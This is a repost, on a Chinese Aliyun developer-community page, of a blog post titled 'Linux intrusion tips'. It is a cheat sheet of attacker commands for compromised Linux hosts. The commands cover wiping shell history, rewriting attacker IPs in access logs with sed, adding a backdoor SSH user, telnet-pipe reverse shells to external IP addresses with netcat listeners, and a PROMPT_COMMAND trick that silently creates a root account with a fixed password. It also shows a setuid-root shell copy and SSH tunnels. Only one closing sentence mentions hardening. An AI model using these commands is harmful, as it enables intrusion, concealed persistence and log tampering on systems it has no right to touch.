AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Linux入侵--some shit tips

2017-11-17 1275
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
  1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪恶用法
邪恶的替换到登录的IP和日志里的访问IP
sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security
邪恶的添加ssh限制登录的用户
sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND   PID USER   FD   TYPE   DEVICE SIZE NODE NAME
sshd    18662 root   11u IPv6 27925867       TCP *:ssh (LISTEN)
sshd    31793 sshd   12u IPv6 34742994       TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
3.通过webshell反弹shell回来之后获取真正的ttyshell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
另外一种获取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通过TELNET进行反向连接:
telnet [attacker_ipaddr] [port1] | /bin/bash | telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 | /bin/bash | telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000|/bin/bash|/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面运行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088|/bin/bash|/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unalias ls
7.linux的BASH提权
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客入侵成本,没实施的同学可以考虑在标准化里面加入这个操作



















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/354564,如需转载请自行联系原作者

文章标签:
Shell
关系型数据库
Linux
网络安全
网络协议
关键词:
Linux入侵
Linux some
Linux tips
技术小美
目录
相关文章
科技小能手
|
安全 网络协议 Linux
linux的FTP服务器搭建及FTP服务器的入侵和防御
科技小能手
3181 0
江湖有缘
|
6月前
|
Ubuntu 安全 Linux
Linux系统之安装Ninvaders太空入侵者小游戏
【7月更文挑战第9天】Linux系统之安装Ninvaders太空入侵者小游戏
江湖有缘
59 0
XError_xiaoyu
|
8月前
|
安全 Linux Shell
Linux系统入侵排查(二)
本文介绍了Linux系统入侵排查的步骤,包括检查历史命令记录、可疑端口和进程、开机启动项以及定时任务。作者强调了了解这些技能对于攻防两端的重要性,并提供了相关命令示例,如查看`/root/.bash_history`记录、使用`netstat`分析网络连接、检查`/etc/rc.local`和`/etc/cron.*`目录下的可疑脚本等。此外,还提到了如何查看和管理服务的自启动设置,以判断是否被恶意篡改。文章旨在帮助读者掌握Linux服务器安全维护的基本技巧。
XError_xiaoyu
145 2
狗哥不是甜妹
|
7月前
|
Ubuntu Java Linux
Ubuntu20.04下载jdk遇到各种奇怪问题大集,Linux如何将默认的OpenJDK切换成自己安装的JDK版本(以JDK1.8为例),无需卸载原有OpenJDK,Some packages co
Ubuntu20.04下载jdk遇到各种奇怪问题大集,Linux如何将默认的OpenJDK切换成自己安装的JDK版本(以JDK1.8为例),无需卸载原有OpenJDK,Some packages co
狗哥不是甜妹
210 0
XError_xiaoyu
|
8月前
|
监控 安全 Linux
Linux系统入侵排查(三)
本文介绍了Linux系统入侵排查的相关知识。首先解释了进行系统入侵排查的原因,即当企业遭受黑客攻击、系统崩溃或其他安全事件时,需要迅速恢复系统并找出入侵来源。接着,重点讲述了日志入侵排查的重要性,因为日志文件记录了系统的重要活动,可以提供入侵行为的线索。
XError_xiaoyu
81 0
XError_xiaoyu
|
8月前
|
缓存 安全 Linux
Linux系统入侵排查(一)
本文探讨了在遭遇黑客入侵或系统异常时进行应急响应和排查的必要性,重点介绍了基于Kali Linux的入侵排查步骤。排查的目标是找出潜在的恶意活动,恢复系统的安全性,并防止未来攻击。总结来说,进行Linux系统入侵排查需要密切关注账号安全,跟踪历史命令,及时识别并消除安全隐患。同时,保持对最新攻击手段和技术的了解,以便更好地防御和应对潜在的网络安全威胁。
XError_xiaoyu
225 0
嵌入式Linux充电站
|
Linux 开发工具 C语言
编译Linux内核一定要知道的几个小Tips
编译Linux内核一定要知道的几个小Tips
嵌入式Linux充电站
136 0
heardic
|
运维 安全 网络协议
GScan - Linux安全入侵扫描工具
GScan - Linux安全入侵扫描工具
heardic
318 0
cejze5tbulhvo
|
Ubuntu 网络协议 Linux
Linux - Ubuntu下执行apt-get update报错:Some index files failed to download. They have been ignored, or old ones used instead.
Linux - Ubuntu下执行apt-get update报错:Some index files failed to download. They have been ignored, or old ones used instead.
cejze5tbulhvo
2443 0
Linux - Ubuntu下执行apt-get update报错:Some index files failed to download. They have been ignored, or old ones used instead.
Adam__
|
Linux Windows
Linux指令使用小tips
关于Linux指令使用的小tips
Adam__
143 0
Linux指令使用小tips

热门文章

最新文章

  • 1
    (已解决)Linux环境—bash: wget: command not found; Docker pull报错Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled
  • 2
    Linux缓存管理:如何安全地清理系统缓存
  • 3
    【手把手教你Linux环境下快速搭建Kafka集群】内含脚本分发教程,实现一键部署多个Kafka节点
  • 4
    Prometheus+Grafana+NodeExporter:构建出色的Linux监控解决方案,让你的运维更轻松
  • 5
    Linux安装jdk、mysql、redis
  • 6
    Linux网络文件系统NFS:配置与管理指南
  • 7
    golang编译成Linux可运行文件
  • 8
    Linux 各发行版安装 ping 命令指南
  • 9
    Linux 安装python3.7.6
  • 10
    linux之core文件如何查看和调试
  • 1
    Linux dump命令教程
    201
  • 2
    深入理解Linux下的DNS技术
    126
  • 3
    【好玩的开源项目】Linux系统之部署adarkroom文字风格冒险小游戏
    136
  • 4
    Linux磁盘精准缩容:操作详解与技巧
    216
  • 5
    linux python调用本地摄像头
    108
  • 6
    讲解linux下的Qt如何编译oracle的驱动库libqsqloci.so
    210
  • 7
    如何在 Linux 中创建别名并使用别名命令?
    156
  • 8
    如何在Linux中使用locate和find进行不区分大小写的文件搜索?
    195
  • 9
    Linux命令那么多,其实只需要记住这些就足够了!
    64
  • 10
    systemd-cgls:Linux中的Cgroup层级结构查看利器
    126

    • 相关课程

    更多
  • Linux Web服务器Nginx搭建与配置
  • Linux用户和组管理
  • Linux基本命令
  • Linux企业运维实战 - 入门及常用命令
  • Linux Shell 编程入门与实战
  • Linux网络进阶 - TCP/IP协议及OSI七层模型

    • 相关电子书

    更多
  • Alibaba Cloud Linux 3 发布
  • ECS系统指南之Linux系统诊断
  • ECS运维指南 之 Linux系统诊断

    • 相关实验场景

    更多
  • 使用计算巢企业应用,一键获取专属的Linux服务器管理软件
  • 部署Linux主机管理系统WDCP
  • 快速配置Linux云服务器
  • 基于Linux命令实现WordPress手动建站
  • Linux系统的安全登录
  • Linux指令入门-文件管理

    • 推荐镜像

    更多
  • mxlinux-iso
  • archlinuxarm
  • archlinuxcn
    • 下一篇
    阿里云开通OSS存储服务详细流程